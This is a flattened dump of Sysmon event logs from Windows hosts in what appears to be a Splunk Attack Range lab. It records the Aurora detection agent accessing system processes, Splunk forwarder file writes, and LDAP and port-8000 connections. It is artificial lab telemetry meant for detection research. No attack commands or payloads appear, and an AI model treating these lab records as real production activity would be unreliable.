Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045760Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.065{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045759Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.041{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045758Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.035{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045757Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.026{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045756Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.022{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045755Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.021{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045754Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.018{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045753Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.016{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045752Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.013{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045751Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.012{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045750Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.009{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045749Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.009{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045748Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.008{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045747Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.007{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045746Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:55.005{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 23542300x800000000000000018124Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:56.845{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1E676B77158BD381CA2A0A94B660F61,SHA256=3F4061B10CE216722F22D0D6974D78D5D663C380043ECFBE2BAE188B92818767,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000045775Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:54.369{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56438-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000045774Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:54.369{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56438-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 23542300x800000000000000045773Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:56.345{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\surveyor-20230118113739-049MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045772Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:56.032{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=6EE8F16AA0619BA036D38156DC23DD03,SHA256=2E400FB25F559E556B30A5133D155FB902C0821D3E5E2608AB8C527B913B0355,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045771Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:56.001{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A374247BA252EFA8AAA56322B233F1D8,SHA256=BFE09B139191F99BAA18B129C6E01A4EE24618075927E746DEE631EDE91B9FC4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018125Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:57.916{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E02F0C35D8F30AEC551FE5F8AA72ADAC,SHA256=F9524601C4A1470D56191358D4CAB68BA16311F34FC41B7CDD8D7F753E8543B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045776Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:57.070{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DC0E3C1DDF05FF1937FD9F1CFD07B36,SHA256=1B1041FD6035D413FE501216EEF7FFAD98F7378535D71D090BF6E46B7EEC843A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018126Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:58.990{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A9EFA001473FB161C59ACCD803DE482,SHA256=D36AA309314A30CBB655B0B39BD28A45E4B300A4CE5CEBBDB22AE0FF1A556653,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045777Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:58.132{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD719A05BF72332CCCB49953613BC5AA,SHA256=3B9AB6E5F031B3218C2B3B15FBE2A61B5E1DD57339396C6CF2DC8DCBCAD78659,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000045779Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:57.572{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56439-false10.0.1.12-8000- 23542300x800000000000000045778Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:27:59.235{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7005D952BEBB6AFC7AB92FF4CC793551,SHA256=337AC9BCB4EF0C197A64C425CCBB4D3DF640F673B0C529600CF55FC51A648D46,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000018127Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:27:57.957{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50165-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000045781Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:00.318{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C21DF458D86320523BF7F9D135425FAA,SHA256=E109F03E44C1F437E930218243A72A9CD506590ED8915FDC683FFC3E3EDC5C12,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018128Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:00.071{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A111C32DFD973651DEA12186BDBC7F4,SHA256=F545B54389CD7E5079A281E571AB1E85844D63BD50D55ED2ACECE6BB85322F45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045780Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:00.193{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=B3E0A879C66BC10BFAEF2DD19B04E836,SHA256=E18F266CFFADB63C256A928F28A91BAA3668EDE51CA09975DDFECD3B1C48F238,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045782Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:01.404{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FC95F9A9A6AB0993D686633294DF7FE,SHA256=03692B036A60CF7C51C226D0B918D0E8BF707B8AFFE2EB6E3D88E2FBB5E49B26,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000018130Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:01.146{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C541F3F51E3B7F1D8E9FC4A177165EF5,SHA256=D8FB7C1854850A7B4094070A8869924034575D166A49F1B69ED3DE4663754B8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018129Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:01.058{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=D305C060BC53F5D6CE53360D9C640A08,SHA256=0AB13F1EBF907DFAB2CC09732C8DD151C04267888C07C11105A375AB56C9CBC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045783Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:02.502{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0878EB8DDFC79AAD9DDF5C0956FD7C85,SHA256=409E08D80B396D71935E482D72C7F974F600F7D8D2AB6C343949E2152118C9ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018162Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.791{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018161Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.789{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 10341000x800000000000000018160Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:02.787{E5A8D418-DC44-63C7-1C00-00000000B002}20203056C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100850) 